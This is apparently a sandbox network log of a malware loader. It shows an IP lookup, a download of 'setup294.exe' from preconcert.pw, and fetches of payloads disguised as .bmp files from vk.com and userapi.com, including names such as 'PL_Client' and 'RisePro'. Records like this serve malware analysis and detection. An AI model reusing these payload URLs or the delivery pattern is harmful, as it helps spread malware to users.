Network Analysis

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:53:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8m%2BXHIKXdVYkn2If5wvSohvm1bSoohIGzLf9dROsGUFie3mYYBbK5SjKbZjKzqQMaewM8hwgJHe0r1tbOfWhSey8d939DaCxy2fYd%2F3blLlIl08IUwNmQ1W6zIwI4g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80241c1ccd8a8d07-KIX

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: kittenx Date: Wed, 06 Sep 2023 04:53:46 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 305082 Connection: keep-alive X-Powered-By: KPHP/7.4.114558 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixlang=17; expires=Mon, 09 Sep 2024 16:56:51 GMT; path=/; domain=.vk.com Set-Cookie: remixstlid=9081056223464981905_6S6S8LT16rZijYalD6K7qJBrf4bOsRLesN0SYp3fQRg; expires=Thu, 05 Sep 2024 04:53:46 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixlgck=4dba72abc42d3ca655; expires=Sat, 31 Aug 2024 11:07:23 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstid=2115366604_mjrKgBZZmvPCaz4ozhkdVrQRa6fit3XZAQzoxhMd7Dz; expires=Mon, 02 Sep 2024 07:29:27 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220007 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /setup294.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: preconcert.pw Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:53:50 GMT Content-Type: application/x-msdos-program Content-Length: 2365751 Connection: keep-alive Last-Modified: Wed, 06 Sep 2023 02:45:55 GMT ETag: "241937-604a7be0f7ec0" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 6069 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7pV7gUtK0ZGQ2pdtvxRrgCAkqZwzJD7rZTYIj7mFCvaWzmRyC4MWUyrplzOsDJOSydYAjQvSh40L6CLR1w%2BAZx%2FhFhQILdcmfQlim2qnrpE4plgef2ORAYVrPfY50H6I"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80241c4f4fe919e6-KIX alt-svc: h3=":443"; ma=86400

GET /doc44017378_668841700?hash=B7naXG9fPpueUKaZxzbzFzqgThiLopd9A232GVSoLbD&dl=VDCn0RuU4RRcIuzpA6hHZu4JCvVt7UCUAmWFRORbSKs&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9081056223464981905_6S6S8LT16rZijYalD6K7qJBrf4bOsRLesN0SYp3fQRg; remixlgck=4dba72abc42d3ca655; remixstid=2115366604_mjrKgBZZmvPCaz4ozhkdVrQRa6fit3XZAQzoxhMd7Dz

HTTP/1.1 302 Found Server: kittenx Date: Wed, 06 Sep 2023 04:53:53 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114558 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c909618/u44017378/docs/d58/7bf5e3bbbea6/Synapse.bmp?extra=mzMMk3WSUR9nXjlWZ6cDWS8uZXnpeH5HFoj4k-neSMlSwedoZanNxQoG3h1Fl180ZYqPy_dIeBEOfQRiGTKUc2qv1mDlwQ6hq_BjfKmI04Adw-GHS1o0utmIeVwn4vFkEZ17GUfHoBCOUPhw X-Frontend: front220007 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc44017378_668679037?hash=6lxdrm9NUkSryZCfzYZn4zR2sOTXzaKgfQIcVCaPnvX&dl=FLqYTpktPSSWsXhtSyyzRawRyuZZexn7WIKXiXEZBv4&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9081056223464981905_6S6S8LT16rZijYalD6K7qJBrf4bOsRLesN0SYp3fQRg; remixlgck=4dba72abc42d3ca655; remixstid=2115366604_mjrKgBZZmvPCaz4ozhkdVrQRa6fit3XZAQzoxhMd7Dz

HTTP/1.1 302 Found Server: kittenx Date: Wed, 06 Sep 2023 04:53:53 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114558 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c909618/u44017378/docs/d36/4045d7e5e2af/PL_Client.bmp?extra=41RYXiYdonWnWPYwQIzl_E40YzLt9e-a585sYDB48TJ1guOgXM82khcH113VcyDUy1qRwuEub4FUsSEnl5OfhF82khtCO4eGvfgR1-OEX6MePbBwA6qux-eLDXjut3NIGwniEJcDMP8LnpSO X-Frontend: front220007 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909618/u44017378/docs/d58/7bf5e3bbbea6/Synapse.bmp?extra=mzMMk3WSUR9nXjlWZ6cDWS8uZXnpeH5HFoj4k-neSMlSwedoZanNxQoG3h1Fl180ZYqPy_dIeBEOfQRiGTKUc2qv1mDlwQ6hq_BjfKmI04Adw-GHS1o0utmIeVwn4vFkEZ17GUfHoBCOUPhw HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 06 Sep 2023 04:53:53 GMT Content-Type: image/x-ms-bmp Content-Length: 349188 Connection: keep-alive Last-Modified: Mon, 04 Sep 2023 05:06:55 GMT ETag: "64f565ef-55404" Expires: Fri, 06 Oct 2023 04:53:53 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /c909618/u44017378/docs/d36/4045d7e5e2af/PL_Client.bmp?extra=41RYXiYdonWnWPYwQIzl_E40YzLt9e-a585sYDB48TJ1guOgXM82khcH113VcyDUy1qRwuEub4FUsSEnl5OfhF82khtCO4eGvfgR1-OEX6MePbBwA6qux-eLDXjut3NIGwniEJcDMP8LnpSO HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 06 Sep 2023 04:53:54 GMT Content-Type: image/x-ms-bmp Content-Length: 3685892 Connection: keep-alive Last-Modified: Thu, 31 Aug 2023 13:24:51 GMT ETag: "64f094a3-383e04" Expires: Fri, 06 Oct 2023 04:53:54 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#test HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9081056223464981905_6S6S8LT16rZijYalD6K7qJBrf4bOsRLesN0SYp3fQRg; remixlgck=4dba72abc42d3ca655; remixstid=2115366604_mjrKgBZZmvPCaz4ozhkdVrQRa6fit3XZAQzoxhMd7Dz; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Wed, 06 Sep 2023 04:53:56 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 305097 Connection: keep-alive X-Powered-By: KPHP/7.4.114558 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220007 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc44017378_668916923?hash=sOYzznQFdvahBVyVjkbZnzPi3TCGlZg6RM6IHhJTZtL&dl=WPCbPohX0oULQzTqTTGTJNQWxrKyDARUvPHJcYJtGbP&api=1&no_preview=1#qq HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9081056223464981905_6S6S8LT16rZijYalD6K7qJBrf4bOsRLesN0SYp3fQRg; remixlgck=4dba72abc42d3ca655; remixstid=2115366604_mjrKgBZZmvPCaz4ozhkdVrQRa6fit3XZAQzoxhMd7Dz

HTTP/1.1 302 Found Server: kittenx Date: Wed, 06 Sep 2023 04:54:00 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114558 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c909218/u44017378/docs/d31/28287d82e701/3.bmp?extra=Eia0Z52O_QfMzxBphvQv2mAhSnbUD5gztBKz2S-85eW2DofIDB-aCKBuZ393oBZW0tDYKH9h7atpaV_aJBQybspAkUHNC-pEe72vNCg8Kk1iD_XA5Um1USzPPozdvJvAOg3vHT-D_AIed8L2 X-Frontend: front220007 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909218/u44017378/docs/d31/28287d82e701/3.bmp?extra=Eia0Z52O_QfMzxBphvQv2mAhSnbUD5gztBKz2S-85eW2DofIDB-aCKBuZ393oBZW0tDYKH9h7atpaV_aJBQybspAkUHNC-pEe72vNCg8Kk1iD_XA5Um1USzPPozdvJvAOg3vHT-D_AIed8L2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 06 Sep 2023 04:54:01 GMT Content-Type: image/x-ms-bmp Content-Length: 1137668 Connection: keep-alive Last-Modified: Tue, 05 Sep 2023 15:17:13 GMT ETag: "64f74679-115c04" Expires: Fri, 06 Oct 2023 04:54:01 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc44017378_668916984?hash=z1dD7zDOKf4ZPQJxQGiBgAjggkhOTKzwGcbzPqETlMz&dl=qmY4pwWN7rzbugtcn7O1yC8XQAj2CqQOYWt2YS9MT9s&api=1&no_preview=1#9f HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9081056223464981905_6S6S8LT16rZijYalD6K7qJBrf4bOsRLesN0SYp3fQRg; remixlgck=4dba72abc42d3ca655; remixstid=2115366604_mjrKgBZZmvPCaz4ozhkdVrQRa6fit3XZAQzoxhMd7Dz

HTTP/1.1 302 Found Server: kittenx Date: Wed, 06 Sep 2023 04:54:02 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114558 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c240331/u44017378/docs/d3/12830610f737/ResortedMetaphrase.bmp?extra=sJUz3R5N8E8T2U3-Oy6z6Gn4gPEMsBChQOzEqvJr5tl3sIwCWpIO_HTic5PfalDQbPCyxepzGd0O1Iq1W9y2aLpy91N7vAjZoAHfJCxaGS8jPoJgoJhoYvMfs3Q9JUjLDkS7cpeHQl7ZgZOs X-Frontend: front220007 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c240331/u44017378/docs/d3/12830610f737/ResortedMetaphrase.bmp?extra=sJUz3R5N8E8T2U3-Oy6z6Gn4gPEMsBChQOzEqvJr5tl3sIwCWpIO_HTic5PfalDQbPCyxepzGd0O1Iq1W9y2aLpy91N7vAjZoAHfJCxaGS8jPoJgoJhoYvMfs3Q9JUjLDkS7cpeHQl7ZgZOs HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 06 Sep 2023 04:54:02 GMT Content-Type: image/x-ms-bmp Content-Length: 407044 Connection: keep-alive Last-Modified: Tue, 05 Sep 2023 15:18:14 GMT ETag: "64f746b6-63604" Expires: Fri, 06 Oct 2023 04:54:02 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#stats HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9081056223464981905_6S6S8LT16rZijYalD6K7qJBrf4bOsRLesN0SYp3fQRg; remixlgck=4dba72abc42d3ca655; remixstid=2115366604_mjrKgBZZmvPCaz4ozhkdVrQRa6fit3XZAQzoxhMd7Dz; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Wed, 06 Sep 2023 04:54:03 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 305097 Connection: keep-alive X-Powered-By: KPHP/7.4.114558 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220007 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc44017378_668805679?hash=Pq8nRu8IL2bYqDVs2GPjMvpAFMOm04kusdFGQmRlGY0&dl=ns6C3Wug8h8cGKJrvWC9ONCmtSXnbVIqzmpprkB3Voz&api=1&no_preview=1#rise HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9081056223464981905_6S6S8LT16rZijYalD6K7qJBrf4bOsRLesN0SYp3fQRg; remixlgck=4dba72abc42d3ca655; remixstid=2115366604_mjrKgBZZmvPCaz4ozhkdVrQRa6fit3XZAQzoxhMd7Dz; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Wed, 06 Sep 2023 04:54:04 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114558 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c909228/u44017378/docs/d21/7ad101a96b02/RisePro_0_5_eM6kP0V0t0TJM31LPkFZ.bmp?extra=XXZOHqfnMq17vouPpzTFs3JuQrmoHXmTSMlflvAzh2GLImsRHfMz9eBd4CuMjz8ELbdw9smSs0DnbidzeGfroV0r-b9IgDwMl_TlfFZuryV19PDmHTTp_h0wGXPgYU4pHWQ3GNoEpMFPQLfl X-Frontend: front220007 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909228/u44017378/docs/d21/7ad101a96b02/RisePro_0_5_eM6kP0V0t0TJM31LPkFZ.bmp?extra=XXZOHqfnMq17vouPpzTFs3JuQrmoHXmTSMlflvAzh2GLImsRHfMz9eBd4CuMjz8ELbdw9smSs0DnbidzeGfroV0r-b9IgDwMl_TlfFZuryV19PDmHTTp_h0wGXPgYU4pHWQ3GNoEpMFPQLfl HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 06 Sep 2023 04:54:04 GMT Content-Type: image/x-ms-bmp Content-Length: 1017860 Connection: keep-alive Last-Modified: Sun, 03 Sep 2023 08:29:30 GMT ETag: "64f443ea-f8804" Expires: Fri, 06 Oct 2023 04:54:04 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc44017378_668790441?hash=ZAKf3wtiDekEKOwL5zOUpKlhs3NsBThU4THBbA9UjZ0&dl=tGcv3oqIrQKDSR0z8GXJxfn9P4s1HZm2ci3UQevYE7w&api=1&no_preview=1#test2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9081056223464981905_6S6S8LT16rZijYalD6K7qJBrf4bOsRLesN0SYp3fQRg; remixlgck=4dba72abc42d3ca655; remixstid=2115366604_mjrKgBZZmvPCaz4ozhkdVrQRa6fit3XZAQzoxhMd7Dz; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Wed, 06 Sep 2023 04:54:05 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114558 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c240331/u44017378/docs/d40/efd676633f21/test2.bmp?extra=7Tl2Y-CX-JxiRCYulouwERP3ItXHBJDXxyoPj0iVEHSIa9hZ7xvFnG2fGentCZSFBhCQxO-UxYGoZHq-WfhVsGNzMCnfmCbfx4QRc17JBaevHEahprxnIt83DzE8XokOPOHZg2UjY8lhxjkL X-Frontend: front220007 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c240331/u44017378/docs/d40/efd676633f21/test2.bmp?extra=7Tl2Y-CX-JxiRCYulouwERP3ItXHBJDXxyoPj0iVEHSIa9hZ7xvFnG2fGentCZSFBhCQxO-UxYGoZHq-WfhVsGNzMCnfmCbfx4QRc17JBaevHEahprxnIt83DzE8XokOPOHZg2UjY8lhxjkL HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 06 Sep 2023 04:54:06 GMT Content-Type: image/x-ms-bmp Content-Length: 806404 Connection: keep-alive Last-Modified: Sat, 02 Sep 2023 18:05:49 GMT ETag: "64f3797d-c4e04" Expires: Fri, 06 Oct 2023 04:54:06 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc44017378_668685574?hash=2Z9kWDMxHv9Bg52ieOFMjjyZlIe2LzZhpXJtbJfi2jD&dl=MckLSTrLnFqxzbDQcQsY8zw8KxvNLWnEyU8AMbhyK6s&api=1&no_preview=1#WW1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9081056223464981905_6S6S8LT16rZijYalD6K7qJBrf4bOsRLesN0SYp3fQRg; remixlgck=4dba72abc42d3ca655; remixstid=2115366604_mjrKgBZZmvPCaz4ozhkdVrQRa6fit3XZAQzoxhMd7Dz

HTTP/1.1 302 Found Server: kittenx Date: Wed, 06 Sep 2023 04:54:06 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114558 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-21.userapi.com/c909628/u44017378/docs/d11/1a3013098cbf/WWW1.bmp?extra=xgcuwlyssMW5fhehD936AqhRSGL9n6WAhvJJzjwcFZ3WMiE8xWxO3qKhr9_8jnDUTj1l3e5eKgd9DPl2hGHNRQsMstXoksgW-4kZoEzSOKif1Txq8PmSgC4s2KKLAdrZ-IWl7XcwtYoplwO1 X-Frontend: front220007 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909628/u44017378/docs/d11/1a3013098cbf/WWW1.bmp?extra=xgcuwlyssMW5fhehD936AqhRSGL9n6WAhvJJzjwcFZ3WMiE8xWxO3qKhr9_8jnDUTj1l3e5eKgd9DPl2hGHNRQsMstXoksgW-4kZoEzSOKif1Txq8PmSgC4s2KKLAdrZ-IWl7XcwtYoplwO1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-21.userapi.com Cache-Control: no-cache Connection: Keep-Alive

